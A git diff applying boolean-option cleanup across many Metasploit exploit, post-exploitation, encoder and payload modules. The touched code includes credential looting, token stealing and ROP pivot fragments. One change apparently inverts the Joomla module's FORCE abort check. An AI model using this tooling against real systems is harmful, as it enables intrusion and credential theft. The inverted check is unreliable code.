a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb +++ b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RPORT(69), OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']), - OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false']) + OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false]) ], self.class) end diff --git a/modules/encoders/x86/opt_sub.rb b/modules/encoders/x86/opt_sub.rb index a28dbc3702..395d912ec9 100644 --- a/modules/encoders/x86/opt_sub.rb +++ b/modules/encoders/x86/opt_sub.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Encoder register_options( [ OptString.new( 'ValidCharSet', [ false, "Specify a known set of valid chars (ALPHA, ALPHANUM, FILEPATH)" ]), - OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten" ]) + OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten", false]) ], self.class) end @@ -179,10 +179,8 @@ class Metasploit3 < Msf::Encoder raise EncodingError, "Unable to find AND-able chars resulting 0 in the valid character set." end - protect_payload = (datastore['OverwriteProtect'] || "").downcase == "true" - # with everything set up, we can now call the encoding routine - state.decoder_stub = encode_payload(state.buf, reg_offset, protect_payload) + state.decoder_stub = encode_payload(state.buf, reg_offset, datastore['OverwriteProtect']) state.buf = "" state.decoder_stub diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index b2f4258902..b23594e3f3 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'WfsDelay' => 300, #5 minutes - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'EXITFUNC' => 'thread' }, 'Platform' => ['php'], diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index 81897bc3e0..4dd52b4ac5 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -99,7 +99,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.body =~ /Set Default Options for #{printer_name}/ vprint_good("Added printer successfully") delete_printer(printer_name) - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) vprint_error("Authentication failed") elsif res.code == 426 vprint_error("SSL required - set SSL true") @@ -129,7 +129,7 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/ print_good("Added printer successfully") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.") @@ -145,7 +145,7 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.") elsif res.body =~ /Test page sent; job ID is/ vprint_good("Added test page to printer queue") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.") @@ -159,7 +159,7 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.") elsif res.body =~ /has been deleted successfully/ print_status("Deleted printer '#{printer_name}' successfully") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) vprint_warning("Could not delete printer '#{printer_name}' - Authentication failed.") elsif res.code == 426 vprint_warning("Could not delete printer '#{printer_name}' - SSL required - set SSL true.") diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb index c047d6242c..9e2974d1db 100644 --- a/modules/exploits/multi/http/joomla_http_header_rce.rb +++ b/modules/exploits/multi/http/joomla_http_header_rce.rb @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false + if check == Exploit::CheckCode::Safe && datastore['FORCE'] print_error('Target seems safe, so we will not continue.') return end diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index e00fd67998..5d571261e1 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote # msf/core/exploit/http/server.rb # def start_http(opts={}) - # Ensture all dependencies are present before initializing HTTP + # Ensure all dependencies are present before initializing HTTP use_zlib comm = datastore['ListenerComm'] @@ -255,7 +255,7 @@ class Metasploit3 < Msf::Exploit::Remote # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index c8edda9b97..4969081012 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body) if b return b.captures[0] - elsif datastore['HTTP::chunked'] == true + elsif datastore['HTTP::chunked'] b = /chunked Transfer-Encoding forbidden/.match(res.body) if b fail_with(Failure::Unknown, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.') diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index 996a060a4b..71bc7c201d 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body) if b return b.captures[0] - elsif datastore['HTTP::chunked'] == true + elsif datastore['HTTP::chunked'] b = /chunked Transfer-Encoding forbidden/.match(res.body) if b fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.') diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index 9a75e1d9cb..ff207ab0a2 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -110,7 +110,7 @@ print "LFI test for storable flaw is: $frozen\n"; end def exploit - if datastore['DESTRUCTIVE'] == true + if datastore['DESTRUCTIVE'] exploit_destructive else exploit_nondestructive diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index e1f1d0072b..cd1b73f847 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote return p end - if t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/ + if !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,257/ print_status("Using Rop Chain For Flash: #{flash_version}") pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000) @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot}) - elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/ + elsif !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,265/ print_status("Using Rop Chain For Flash: #{flash_version}") pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000) @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot}) - elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/ + elsif !t['ASLR'] && datastore['ROP'] == 'SWF' && flash_version =~ /11,3,300,268/ print_status("Using Rop Chain For Flash: #{flash_version}") pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000) diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index fa0e081109..9657d89ac5 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb index 5aac5af13b..d3ff5db2fa 100644 --- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb +++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index eaba3e96eb..5c39a56877 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote register_evasion_options( [ - OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false']) + OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', false]) ]) end @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote end def generate_space - if datastore['PlaylistSpaceInjection'] == true + if datastore['PlaylistSpaceInjection'] return rand_text(rand(100)+1, nil, " \t") else return '' diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 9f479be312..90593e1045 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] - if datastore['HTML'] == true + if datastore['HTML'] body = create_email_body_html(datastore['MESSAGE'], msg.subject) content_type = "text/html; charset=\"iso-8859-1\"" msg.add_part(body, content_type, 'quoted-printable') diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index f5da05ca0a..85451818e8 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index 1f9be2a724..fcc56e896e 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb index 9be4a7dc85..7a1f7aa9bf 100644 --- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb +++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb index 7e82c08be2..8eedee75ae 100644 --- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index 541f6ac734..4a49fb2e31 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index b7cb7a9e32..914e6eb59c 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index 24ae5f20f2..e07ec31995 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index 6e76f51aff..7c8f3cadab 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index a210a5ddad..ea1f061359 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 41af41ef90..d3b5b542a7 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'EXITFUNC' => "none", #'InitialAutoRunScript' => 'migrate -f', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index e6bf891a76..3cfcd85b20 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index d2b6298122..4cfb301b31 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index be1f865651..41eaa5c5d4 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote end =begin -mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c +mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c 1c1 < void *__thiscall CPackage::_GetCurrentIcon(void *this, int a2) --- diff --git a/modules/exploits/windows/fileformat/ms13_071_theme.rb b/modules/exploits/windows/fileformat/ms13_071_theme.rb index e524c4a34b..23615303af 100644 --- a/modules/exploits/windows/fileformat/ms13_071_theme.rb +++ b/modules/exploits/windows/fileformat/ms13_071_theme.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb index 9815d96b34..f23ae296f5 100644 --- a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb +++ b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index 0c8492f50e..25f0fbc989 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Payload' => { diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index 1b8c895093..7106e3bf07 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote "\r\n\r\n" + "\r\nSelect \"DAV:displayname\" from scope()\r\n\r\n\r\n" - if datastore['InvalidSearchRequest'] == true + if datastore['InvalidSearchRequest'] xml = rand_text(rand(1024) + 32) end diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index fa9004658b..d75e3ff096 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -377,7 +377,7 @@ exec sp_executesql @z| runme.gsub!(/%STUFF%/, enc) # go! - if (not mssql_login_datastore) + if !mssql_login_datastore fail_with(Failure::NoAccess, "Unable to log in!") end begin @@ -452,7 +452,7 @@ exec sp_executesql @z| return nil end - if (not logged_in) + if !logged_in fail_with(Failure::NoAccess, "Invalid SQL Server credentials") end res = mssql_query("select @@version", datastore['VERBOSE']) diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index e9bc7580e0..5497f01634 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']), + OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', false]), OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']), OptString.new('PASSWORD', [true, 'The password for the specified username']) ], self.class) @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote # Check if credentials are correct print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...") - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("Invalid SQL Server credentials") print_status("-------------------------------------------------") return @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote } if masterList.length == 1 print_good("Successfully connected to #{server["name"]}") - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] show_configs(server["name"],parse_results,true) elsif server["db_sysadmin"] == 1 print_good("Sysadmin on #{server["name"]}") @@ -185,7 +185,7 @@ class Metasploit3 < Msf::Exploit::Remote write_to_report(name,server,parse_results,linked_server_table,link_status) # Display link server information in verbose mode - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] show_configs(name,parse_results) print_status(" o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}") else @@ -219,7 +219,7 @@ class Metasploit3 < Msf::Exploit::Remote linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed'] # Display status to user - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] print_status(" ") print_error("Linked Server: #{name} ") print_error(" o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed") @@ -435,14 +435,14 @@ class Metasploit3 < Msf::Exploit::Remote if datastore['DEPLOYLIST']=="" datastore['DEPLOYLIST'] = nil end - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + if !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - Checking if #{name} is on the deploy list...") end if datastore['DEPLOYLIST'] != nil deploylist = datastore['DEPLOYLIST'].upcase.split(',') end if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + if !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - #{name} is on the deploy list.") end unless shelled.include?(name) @@ -451,7 +451,7 @@ class Metasploit3 < Msf::Exploit::Remote else print_status("Payload already deployed on #{name}") end - elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + elsif !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - #{name} is not on the deploy list") end end diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index d5ebe45d04..5b659211a0 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - if (not mssql_login_datastore) + if !mssql_login_datastore vprint_status("Invalid SQL Server credentials") return Exploit::CheckCode::Detected end @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - if (not mssql_login_datastore) + if !mssql_login_datastore print_status("Invalid SQL Server credentials") return end diff --git a/modules/exploits/windows/scada/codesys_web_server.rb b/modules/exploits/windows/scada/codesys_web_server.rb index 48a22d1afb..0cc85af3cc 100644 --- a/modules/exploits/windows/scada/codesys_web_server.rb +++ b/modules/exploits/windows/scada/codesys_web_server.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Platform' => 'win', 'Payload' => diff --git a/modules/payloads/stages/osx/x86/isight.rb b/modules/payloads/stages/osx/x86/isight.rb index 4b4a7d57a4..7da72a0900 100644 --- a/modules/payloads/stages/osx/x86/isight.rb +++ b/modules/payloads/stages/osx/x86/isight.rb @@ -80,7 +80,7 @@ module Metasploit3 print_status("Photo saved as #{dest}") - if (datastore['AUTOVIEW'] == true) + if datastore['AUTOVIEW'] print_status("Opening photo in a web browser...") Rex::Compat.open_browser(File.expand_path(dest)) end diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 4fd3ca037e..3dcd294417 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -321,17 +321,14 @@ class Metasploit3 < Msf::Post end settings['ftp_bindip'] = "0.0.0.0" if settings['ftp_bindip'] == "*" || settings['ftp_bindip'].empty? - if settings['ssl'] == "1" - settings['ssl'] = "true" - else - if datastore['SSLCERT'] - print_error("Cannot loot the SSL Certificate, SSL is disabled in the configuration file") - end - settings['ssl'] = "false" + settings['ssl'] = settings['ssl'] == "1" + if !settings['ssl'] && datastore['SSLCERT'] + print_error("Cannot loot the SSL Certificate, SSL is disabled in the configuration file") end settings['ssl_certfile'] = items[45].text rescue "" - if settings['ssl_certfile'] != "" and settings['ssl'] == "true" and datastore['SSLCERT'] # lets get the file if its there could be useful in MITM attacks + # Get the file if it is there. It could be useful in MITM attacks + if settings['ssl_certfile'] != "" && settings['ssl'] and datastore['SSLCERT'] sslfile = session.fs.file.new(settings['ssl_certfile']) until sslfile.eof? sslcert << sslfile.read @@ -386,7 +383,7 @@ class Metasploit3 < Msf::Post account['host'] = settings['ftp_bindip'] account['port'] = settings['ftp_port'] - account['ssl'] = settings['ssl'] + account['ssl'] = settings['ssl'].to_s creds << account vprint_status(" Username: #{account['user']}") diff --git a/modules/post/windows/gather/credentials/imail.rb b/modules/post/windows/gather/credentials/imail.rb index db8a566a30..f7823071fa 100644 --- a/modules/post/windows/gather/credentials/imail.rb +++ b/modules/post/windows/gather/credentials/imail.rb @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Post imail_user = datastore['IMAILUSER'] imail_domain = datastore['IMAILDOMAIN'] - print_status("Download iMail user information...") if datastore['VERBOSE'] == false + vprint_status("Download iMail user information...") #Download user data. If no user specified, we dump it all. users = download_info(imail_user, imail_domain) diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index f1af882553..586699344b 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -278,7 +278,7 @@ class Metasploit3 < Msf::Post # If we can impersonate a token, we use that first. # If we can't, we'll try to MIGRATE (more aggressive) if the user wants to got_token = steal_token - if not got_token and datastore["MIGRATE"] + if !got_token && datastore["MIGRATE"] migrate_success = migrate end @@ -330,7 +330,7 @@ class Metasploit3 < Msf::Post end # Migrate back to the original process - if datastore["MIGRATE"] and @old_pid and migrate_success == true + if datastore["MIGRATE"] && @old_pid && migrate_success print_status("Migrating back...") migrate(@old_pid) end diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index 7eae317a56..4e28f9d68d 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -223,12 +223,11 @@ class Metasploit3 < Msf::Post end ## steal token if neccessary - if (datastore['TOKEN'] == '') - token_found,token_user,current_user = token_hunter(domain) - - return if token_found == false - - datastore['TOKEN'] = token_user if current_user == false + if datastore['TOKEN'] == '' + token_found, token_user, current_user = token_hunter(domain) + if token_found && current_user == false + datastore['TOKEN'] = token_user + end end ## steal token @@ -247,7 +246,7 @@ 